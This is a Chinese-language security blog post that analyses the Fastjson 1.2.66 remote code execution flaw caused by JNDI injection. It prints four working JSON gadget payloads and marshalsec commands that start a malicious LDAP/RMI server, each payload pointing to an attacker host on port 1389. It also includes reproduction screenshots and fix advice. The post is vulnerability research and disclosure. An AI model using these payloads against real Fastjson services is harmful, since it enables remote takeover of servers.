<!DOCTYPE html>



  


<html class="theme-next mist use-motion" lang="zh-Hans">
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="代码审计,Fastjson,安全研究,JAVA-Web安全,">





  <link rel="alternate" href="/atom.xml" title="SecurityCN's blog" type="application/atom+xml">






<meta name="description" content="【漏洞分析+复现】Fastjson1.2.66远程代码执行漏洞分析复现含4个Gadget利用Poc构造  一、事件背景近日，Fastjson发布了新版本1.2.67新增了autoType黑名单，在1.2.66及之前版本中存在大量通过JNDI注入绕过黑名单限制的而导致远程代码执行漏洞，远程攻击者可以通过构造的攻击代码触发远程代码执行漏洞，最终可以获取到服务器的控制权限。 二、漏洞信息   漏洞名称">
<meta name="keywords" content="代码审计,Fastjson,安全研究,JAVA-Web安全">
<meta property="og:type" content="article">
<meta property="og:title" content="【漏洞分析+复现】Fastjson1.2.66远程代码执行漏洞分析复现含4个Gadget利用Poc构造">
<meta property="og:url" content="www.ja0k.com/2020/03/22/【漏洞分析+复现】Fastjson1.2.66远程代码执行漏洞分析复现含4个Gadget利用Poc构造/index.html">
<meta property="og:site_name" content="SecurityCN&#39;s blog">
<meta property="og:description" content="【漏洞分析+复现】Fastjson1.2.66远程代码执行漏洞分析复现含4个Gadget利用Poc构造  一、事件背景近日，Fastjson发布了新版本1.2.67新增了autoType黑名单，在1.2.66及之前版本中存在大量通过JNDI注入绕过黑名单限制的而导致远程代码执行漏洞，远程攻击者可以通过构造的攻击代码触发远程代码执行漏洞，最终可以获取到服务器的控制权限。 二、漏洞信息   漏洞名称">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="/2020/03/22/【漏洞分析+复现】Fastjson1.2.66远程代码执行漏洞分析复现含4个Gadget利用Poc构造/2020-03-25-00-56-21.png">
<meta property="og:image" content="/2020/03/22/【漏洞分析+复现】Fastjson1.2.66远程代码执行漏洞分析复现含4个Gadget利用Poc构造/2020-03-23-17-49-08.png">
<meta property="og:image" content="/2020/03/22/【漏洞分析+复现】Fastjson1.2.66远程代码执行漏洞分析复现含4个Gadget利用Poc构造/2020-03-24-14-23-46.png">
<meta property="og:image" content="/2020/03/22/【漏洞分析+复现】Fastjson1.2.66远程代码执行漏洞分析复现含4个Gadget利用Poc构造/2020-03-24-22-08-11.png">
<meta property="og:image" content="/2020/03/22/【漏洞分析+复现】Fastjson1.2.66远程代码执行漏洞分析复现含4个Gadget利用Poc构造/2020-03-24-23-03-19.png">
<meta property="og:image" content="/2020/03/22/【漏洞分析+复现】Fastjson1.2.66远程代码执行漏洞分析复现含4个Gadget利用Poc构造/2020-03-24-23-05-00.png">
<meta property="og:image" content="/2020/03/22/【漏洞分析+复现】Fastjson1.2.66远程代码执行漏洞分析复现含4个Gadget利用Poc构造/2020-03-24-23-17-50.png">
<meta property="og:image" content="/2020/03/22/【漏洞分析+复现】Fastjson1.2.66远程代码执行漏洞分析复现含4个Gadget利用Poc构造/2020-03-24-23-27-43.png">
<meta property="og:image" content="/2020/03/22/【漏洞分析+复现】Fastjson1.2.66远程代码执行漏洞分析复现含4个Gadget利用Poc构造/2020-03-24-23-43-27.png">
<meta property="og:image" content="/2020/03/22/【漏洞分析+复现】Fastjson1.2.66远程代码执行漏洞分析复现含4个Gadget利用Poc构造/2020-03-24-23-40-50.png">
<meta property="og:image" content="/2020/03/22/【漏洞分析+复现】Fastjson1.2.66远程代码执行漏洞分析复现含4个Gadget利用Poc构造/2020-03-24-23-40-24.png">
<meta property="og:image" content="/2020/03/22/【漏洞分析+复现】Fastjson1.2.66远程代码执行漏洞分析复现含4个Gadget利用Poc构造/2020-03-24-23-37-09.png">
<meta property="og:image" content="/2020/03/22/【漏洞分析+复现】Fastjson1.2.66远程代码执行漏洞分析复现含4个Gadget利用Poc构造/2020-03-24-23-34-17.png">
<meta property="og:updated_time" content="2020-03-25T06:20:06.080Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="【漏洞分析+复现】Fastjson1.2.66远程代码执行漏洞分析复现含4个Gadget利用Poc构造">
<meta name="twitter:description" content="【漏洞分析+复现】Fastjson1.2.66远程代码执行漏洞分析复现含4个Gadget利用Poc构造  一、事件背景近日，Fastjson发布了新版本1.2.67新增了autoType黑名单，在1.2.66及之前版本中存在大量通过JNDI注入绕过黑名单限制的而导致远程代码执行漏洞，远程攻击者可以通过构造的攻击代码触发远程代码执行漏洞，最终可以获取到服务器的控制权限。 二、漏洞信息   漏洞名称">
<meta name="twitter:image" content="/2020/03/22/【漏洞分析+复现】Fastjson1.2.66远程代码执行漏洞分析复现含4个Gadget利用Poc构造/2020-03-25-00-56-21.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Mist',
    version: '5.1.4',
    sidebar: {"position":"left","display":"always","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="www.ja0k.com/2020/03/22/【漏洞分析+复现】Fastjson1.2.66远程代码执行漏洞分析复现含4个Gadget利用Poc构造/">





  <title>【漏洞分析+复现】Fastjson1.2.66远程代码执行漏洞分析复现含4个Gadget利用Poc构造 | SecurityCN's blog</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">SecurityCN's blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <h1 class="site-subtitle" itemprop="description">感谢您关注SecurityCN(微信公众号:securitycn),本号会发布一些个人学习及研究文章，包括但不限于漏洞分析、漏洞挖掘、代码审计、IOT安全、比赛、培训认证等</h1>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-首页">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-归档">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-分类">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br>
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-标签">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-关于">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br>
            
            关于
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br>
            
            搜索
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocomplete="off" placeholder="搜索..." spellcheck="false" type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="www.ja0k.com/2020/03/22/【漏洞分析+复现】Fastjson1.2.66远程代码执行漏洞分析复现含4个Gadget利用Poc构造/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="扫码关注公众号(SecurityCN)">
      <meta itemprop="description" content>
      <meta itemprop="image" content="/images/wechat-qcode.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="SecurityCN's blog">
    </span>

    
      <header class="post-header">

        
        
          <h2 class="post-title" itemprop="name headline">【漏洞分析+复现】Fastjson1.2.66远程代码执行漏洞分析复现含4个Gadget利用Poc构造</h2>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2020-03-22T21:11:47+08:00">
                2020-03-22
              </time>
            

            

            
          </span>

          
            <span class="post-category">
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/技术/" itemprop="url" rel="index">
                    <span itemprop="name">技术</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          
            <span class="post-meta-divider">|</span>
            <span class="page-pv"><i class="fa fa-file-o"></i>浏览
            <span class="busuanzi-value" id="busuanzi_value_page_pv"></span>次
            </span>
          

          
            <div class="post-wordcount">
              
                
                <span class="post-meta-item-icon">
                  <i class="fa fa-file-word-o"></i>
                </span>
                
                  <span class="post-meta-item-text">字数统计&#58;</span>
                
                <span title="字数统计">
                  1.1k
                </span>
              

              
                <span class="post-meta-divider">|</span>
              

              
                <span class="post-meta-item-icon">
                  <i class="fa fa-clock-o"></i>
                </span>
                
                  <span class="post-meta-item-text">阅读时长 &asymp;</span>
                
                <span title="阅读时长">
                  4
                </span>
              
            </div>
          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>【漏洞分析+复现】Fastjson1.2.66远程代码执行漏洞分析复现含4个Gadget利用Poc构造</p>
<p><img src="/2020/03/22/【漏洞分析+复现】Fastjson1.2.66远程代码执行漏洞分析复现含4个Gadget利用Poc构造/2020-03-25-00-56-21.png" alt></p>
<h4 id="一、事件背景"><a href="#一、事件背景" class="headerlink" title="一、事件背景"></a>一、事件背景</h4><p>近日，Fastjson发布了新版本1.2.67新增了autoType黑名单，在1.2.66及之前版本中存在大量通过JNDI注入绕过黑名单限制的而导致远程代码执行漏洞，远程攻击者可以通过构造的攻击代码触发远程代码执行漏洞，最终可以获取到服务器的控制权限。</p>
<h4 id="二、漏洞信息"><a href="#二、漏洞信息" class="headerlink" title="二、漏洞信息"></a>二、漏洞信息</h4><table>
<thead>
<tr>
<th>漏洞名称</th>
<th>Fastjson 远程代码执行漏洞</th>
</tr>
</thead>
<tbody><tr>
<td>CVE编号</td>
<td>-</td>
</tr>
<tr>
<td>影响范围</td>
<td>&lt;=1.2.66</td>
</tr>
<tr>
<td>威胁等级</td>
<td>高危</td>
</tr>
<tr>
<td>公开时间</td>
<td>2020年3月19日</td>
</tr>
</tbody></table>
<h4 id="三、漏洞分析"><a href="#三、漏洞分析" class="headerlink" title="三、漏洞分析"></a>三、漏洞分析</h4><h5 id="3-1-补丁对比"><a href="#3-1-补丁对比" class="headerlink" title="3.1 补丁对比"></a>3.1 补丁对比</h5><p><img src="/2020/03/22/【漏洞分析+复现】Fastjson1.2.66远程代码执行漏洞分析复现含4个Gadget利用Poc构造/2020-03-23-17-49-08.png" alt></p>
<p>通过对比1.2.66和1.2.67版本ParserConfig.java文件中checkautotype类的denyHashCode发现新增了16个黑名单Gadget<br><img src="/2020/03/22/【漏洞分析+复现】Fastjson1.2.66远程代码执行漏洞分析复现含4个Gadget利用Poc构造/2020-03-24-14-23-46.png" alt></p>
<p>注：1.2.42版本之前的黑名单是以denyList形式，存在被黑客利用里面Gadget来攻击低版本的fastjson风险，之后版本码中黑名单都是以hashCode的方式存放在源码里，denyHashCode的计算方式略微复杂，增加了攻击门槛。</p>
<p>jndi注入产生的原因可以归结到以下4点</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">1、lookup参数可控。</span><br><span class="line">2、InitialContext类及他的子类的lookup方法允许动态协议转换</span><br><span class="line">3、lookup查找的对象是Reference类型及其子类</span><br><span class="line">4、当远程调用类的时候默认会在rmi服务器中的classpath中查找，如果不存在就会去url地址去加载类。如果都加载不到就会失败。</span><br></pre></td></tr></table></figure>

<p>就可以实现远程加载恶意的对象，实现远程代码执行。<br>我们发现存在3种方法，可以通过jndi注入导致远程代码执行:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">1.rmi、通过jndi reference远程调用object方法</span><br><span class="line">2.LDAP 通过序列化对象，JNDI Referene，ldap地址</span><br><span class="line">3.CORBA IOR 远程获取实现类</span><br></pre></td></tr></table></figure>

<p>可以使用marshalsec-0.0.3-SNAPSHOT-all.jar开启rmi/ldap 调用web服务器中的恶意对象</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">1. LDAP 方式</span><br><span class="line">java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://127.0.0.1:8000/#Calc</span><br><span class="line">2. RMI 方式</span><br><span class="line">java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer http://127.0.0.1:8000/#Calc</span><br></pre></td></tr></table></figure>

<p>本次将分析已公开的4个Gadget <code>JndiObjectFactory</code>、<code>AnterosDBCPConfig</code> 、<code>CacheJndiTmLookup</code>和<code>JtaTransactionConfig</code></p>
<p>黑名单里有10几个Gadget，后续慢慢研究</p>
<h6 id="1-org-apache-shiro-jndi-JndiObjectFactory"><a href="#1-org-apache-shiro-jndi-JndiObjectFactory" class="headerlink" title="1.org.apache.shiro.jndi.JndiObjectFactory"></a>1.org.apache.shiro.jndi.JndiObjectFactory</h6><p>在org.apache.shiro-core-1.5.1.jar 包中<br><img src="/2020/03/22/【漏洞分析+复现】Fastjson1.2.66远程代码执行漏洞分析复现含4个Gadget利用Poc构造/2020-03-24-22-08-11.png" alt></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">public T getInstance() &#123;</span><br><span class="line">    try &#123;</span><br><span class="line">        if(requiredType != null) &#123;</span><br><span class="line">            return requiredType.cast(this.lookup(resourceName, requiredType));</span><br><span class="line">        &#125; else &#123;</span><br><span class="line">            return (T) this.lookup(resourceName);</span><br><span class="line">        &#125;</span><br></pre></td></tr></table></figure>

<p>resourceName 参数可控<br>poc构造1:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&quot;@type&quot;:&quot;org.apache.shiro.jndi.JndiObjectFactory&quot;,&quot;resourceName&quot;:&quot;ldap://192.168.80.1:1389/Calc&quot;&#125;</span><br></pre></td></tr></table></figure>

<h6 id="2-br-com-anteros-dbcp-AnterosDBCPConfig"><a href="#2-br-com-anteros-dbcp-AnterosDBCPConfig" class="headerlink" title="2. br.com.anteros.dbcp.AnterosDBCPConfig"></a>2. br.com.anteros.dbcp.AnterosDBCPConfig</h6><p>找lookup<br><img src="/2020/03/22/【漏洞分析+复现】Fastjson1.2.66远程代码执行漏洞分析复现含4个Gadget利用Poc构造/2020-03-24-23-03-19.png" alt><br>getObjectOrPerformJndiLookup</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">private Object getObjectOrPerformJndiLookup(Object object)</span><br><span class="line">&#123;</span><br><span class="line">   if (object instanceof String) &#123;</span><br><span class="line">      try &#123;</span><br><span class="line">         InitialContext initCtx = new InitialContext();</span><br><span class="line">         return initCtx.lookup((String) object);</span><br><span class="line">      &#125;</span><br><span class="line">      catch (NamingException e) &#123;</span><br><span class="line">         throw new IllegalArgumentException(e);</span><br><span class="line">      &#125;</span><br><span class="line">   &#125;</span><br><span class="line">   return object;</span><br></pre></td></tr></table></figure>

<p>跟一下调用，发现是传递参数为metricRegistry<br>poc构造2:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&quot;@type&quot;:&quot;br.com.anteros.dbcp.AnterosDBCPConfig&quot;,&quot;metricRegistry&quot;:&quot;ldap://192.168.80.1:1389/Calc&quot;&#125;</span><br></pre></td></tr></table></figure>

<p><img src="/2020/03/22/【漏洞分析+复现】Fastjson1.2.66远程代码执行漏洞分析复现含4个Gadget利用Poc构造/2020-03-24-23-05-00.png" alt></p>
<h6 id="3-org-apache-ignite-cache-jta-jndi-CacheJndiTmLookup"><a href="#3-org-apache-ignite-cache-jta-jndi-CacheJndiTmLookup" class="headerlink" title="3. org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup"></a>3. org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup</h6><p><img src="/2020/03/22/【漏洞分析+复现】Fastjson1.2.66远程代码执行漏洞分析复现含4个Gadget利用Poc构造/2020-03-24-23-17-50.png" alt><br>s 的值为列表jndiNames经过iterator().next遍历返回的对象序列再转化为Sting，jndiNames也是可控<br>poc构造3:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&quot;@type&quot;:&quot;org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup&quot;,&quot;jndiNames&quot;:&quot;ldap://192.168.80.1:1389/Calc&quot;&#125;</span><br></pre></td></tr></table></figure>

<h6 id="4-com-ibatis-sqlmap-engine-transaction-jta-JtaTransactionConfig"><a href="#4-com-ibatis-sqlmap-engine-transaction-jta-JtaTransactionConfig" class="headerlink" title="4. com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig"></a>4. com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig</h6><p><img src="/2020/03/22/【漏洞分析+复现】Fastjson1.2.66远程代码执行漏洞分析复现含4个Gadget利用Poc构造/2020-03-24-23-27-43.png" alt></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">public void setProperties(Properties props) throws SQLException, TransactionException &#123;</span><br><span class="line">  String utxName = null;</span><br><span class="line">  try &#123;</span><br><span class="line">    utxName = (String) props.get(&quot;UserTransaction&quot;);</span><br><span class="line">    InitialContext initCtx = new InitialContext();</span><br><span class="line">    userTransaction = (UserTransaction) initCtx.lookup(utxName);</span><br><span class="line">  &#125; catch (NamingException e) &#123;</span><br><span class="line">    throw new SqlMapException(&quot;Error initializing JtaTransactionConfig while looking up UserTransaction (&quot; + utxName + &quot;).  Cause: &quot; + e);</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>UserTransaction参数 可控<br>poc构造4:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&quot;@type&quot;:&quot;com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig&quot;,&quot;properties&quot;: &#123;&quot;@type&quot;:&quot;java.util.Properties&quot;,&quot;UserTransaction&quot;:&quot;ldap://192.168.80.1:1389/Calc&quot;&#125;&#125;</span><br></pre></td></tr></table></figure>

<h4 id="四、漏洞复现"><a href="#四、漏洞复现" class="headerlink" title="四、漏洞复现"></a>四、漏洞复现</h4><p>*本次复现fastsjon 1.2.66版本 为例<br><img src="/2020/03/22/【漏洞分析+复现】Fastjson1.2.66远程代码执行漏洞分析复现含4个Gadget利用Poc构造/2020-03-24-23-43-27.png" alt><br>第1个：<br>fastjson 受<code>org.apache.shiro.jndi.JndiObjectFactory</code>影响导致RCE<br><img src="/2020/03/22/【漏洞分析+复现】Fastjson1.2.66远程代码执行漏洞分析复现含4个Gadget利用Poc构造/2020-03-24-23-40-50.png" alt><br>第2个：<br>fastjson 受<code>br.com.anteros.dbcp.AnterosDBCPConfig</code>影响导致RCE<br><img src="/2020/03/22/【漏洞分析+复现】Fastjson1.2.66远程代码执行漏洞分析复现含4个Gadget利用Poc构造/2020-03-24-23-40-24.png" alt><br>第3个：<br>fastjson 受<code>org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup</code>影响导致RCE<br><img src="/2020/03/22/【漏洞分析+复现】Fastjson1.2.66远程代码执行漏洞分析复现含4个Gadget利用Poc构造/2020-03-24-23-37-09.png" alt><br>第4个：<br>fastjson 受<code>com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig</code>影响导致RCE<br><img src="/2020/03/22/【漏洞分析+复现】Fastjson1.2.66远程代码执行漏洞分析复现含4个Gadget利用Poc构造/2020-03-24-23-34-17.png" alt></p>
<h4 id="五、修复建议"><a href="#五、修复建议" class="headerlink" title="五、修复建议"></a>五、修复建议</h4><p>1.官方已发布新版本<br><a href="https://github.com/alibaba/fastjson/releases/tag/1.2.67" target="_blank" rel="noopener">https://github.com/alibaba/fastjson/releases/tag/1.2.67</a><br>2 修复建议<br>Fastjson默认关闭autotype，如果项目中不需要该功能，可以删除以下代码：<br>ParserConfig.getGlobalInstance().setAutoTypeSupport(true);</p>
<h4 id="六、附录"><a href="#六、附录" class="headerlink" title="六、附录"></a>六、附录</h4><h5 id="本次分析及复现的相关工具地址"><a href="#本次分析及复现的相关工具地址" class="headerlink" title="本次分析及复现的相关工具地址"></a>本次分析及复现的相关工具地址</h5><p><a href="https://github.com/SecurityCN/Vulnerability-analysis/tree/master/fastjson" target="_blank" rel="noopener">https://github.com/SecurityCN/Vulnerability-analysis/tree/master/fastjson</a></p>
<h5 id="参考："><a href="#参考：" class="headerlink" title="参考："></a>参考：</h5><p>*<a href="https://github.com/alibaba/fastjson/releases" target="_blank" rel="noopener">https://github.com/alibaba/fastjson/releases</a><br>*<a href="https://mp.weixin.qq.com/s/4JzPRolR0cELL5g9bWM_eA" target="_blank" rel="noopener">https://mp.weixin.qq.com/s/4JzPRolR0cELL5g9bWM_eA</a><br>*<a href="https://github.com/threedr3am/learnjavabug" target="_blank" rel="noopener">https://github.com/threedr3am/learnjavabug</a></p>

      
    </div>
    
    
    
	

	
	  <div>
        <div id="wechat_subscriber" style="display: block; padding: 10px 0; margin: 20px auto; width: 100%; text-align: center">
    <img id="wechat_subscriber_qcode" src="/images/wechat-qcode.jpg" alt="扫码关注公众号(SecurityCN) wechat" style="width: 200px; max-width: 100%;">
    <div>欢迎您扫码关注SecurityCN(微信公众号:securitycn),本号会发布一些个人学习及研究文章，包括但不限于漏洞分析、漏洞挖掘、代码审计、IOT安全、比赛、培训认证等</div>
</div>

      </div>
    

    
      <div>
        <div style="padding: 10px 0; margin: 20px auto; width: 90%; text-align: center;">
  <div>坚持原创技术分享，您的支持将鼓励我继续创作！</div>
  <button id="rewardButton" disable="enable" onclick="var qr = document.getElementById('QR'); if (qr.style.display === 'none') {qr.style.display='block';} else {qr.style.display='none'}">
    <span>打赏</span>
  </button>
  <div id="QR" style="display: none;">

    
      <div id="wechat" style="display: inline-block">
        <img id="wechat_qr" src="/images/wechat-reward.jpg" alt="扫码关注公众号(SecurityCN) 微信支付">
        <p>微信支付</p>
      </div>
    

    

    

  </div>
</div>

      </div>
    

    
      <div>
        <ul class="post-copyright">
  <li class="post-copyright-author">
    <strong>本文作者：</strong>
    Ja0k@SecurityCN
  </li>
  <li class="post-copyright-link">
    <strong>本文链接：</strong>
    <a href="www.ja0k.com/2020/03/22/【漏洞分析+复现】Fastjson1.2.66远程代码执行漏洞分析复现含4个Gadget利用Poc构造/" title="【漏洞分析+复现】Fastjson1.2.66远程代码执行漏洞分析复现含4个Gadget利用Poc构造">www.ja0k.com/2020/03/22/【漏洞分析+复现】Fastjson1.2.66远程代码执行漏洞分析复现含4个Gadget利用Poc构造/</a>
  </li>
  <li class="post-copyright-license">
    <strong>版权声明： </strong>
    本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/3.0/" rel="external nofollow" target="_blank">CC BY-NC-SA 3.0</a> 许可协议。转载请注明出处！
  </li>
</ul>

      </div>
    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/代码审计/" rel="tag"># 代码审计</a>
          
            <a href="/tags/Fastjson/" rel="tag"># Fastjson</a>
          
            <a href="/tags/安全研究/" rel="tag"># 安全研究</a>
          
            <a href="/tags/JAVA-Web安全/" rel="tag"># JAVA-Web安全</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2020/03/17/【漏洞分析+漏洞复现】通达OA任意文件上传漏洞分析及复现/" rel="next" title="【漏洞分析&漏洞复现】通达OA任意文件上传和文件包含漏洞导致RCE分析及复现">
                <i class="fa fa-chevron-left"></i> 【漏洞分析&漏洞复现】通达OA任意文件上传和文件包含漏洞导致RCE分析及复现
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2020/06/05/【漏洞复现】CVE-2020-0796 SMBGhost RCE exp复现过程/media/" rel="prev" title="【漏洞复现】CVE-2020-0796 SMBGhost RCE exp复现过程">
                【漏洞复现】CVE-2020-0796 SMBGhost RCE exp复现过程 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image" src="/images/wechat-qcode.jpg" alt="扫码关注公众号(SecurityCN)">
            
              <p class="site-author-name" itemprop="name">扫码关注公众号(SecurityCN)</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives">
              
                  <span class="site-state-item-count">12</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">2</span>
                  <span class="site-state-item-name">分类</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">11</span>
                  <span class="site-state-item-name">标签</span>
                </a>
              </div>
            

          </nav>

          
            <div class="feed-link motion-element">
              <a href="/atom.xml" rel="alternate">
                <i class="fa fa-rss"></i>
                RSS
              </a>
            </div>
          

          
            <div class="links-of-author motion-element">
                
                  <span class="links-of-author-item">
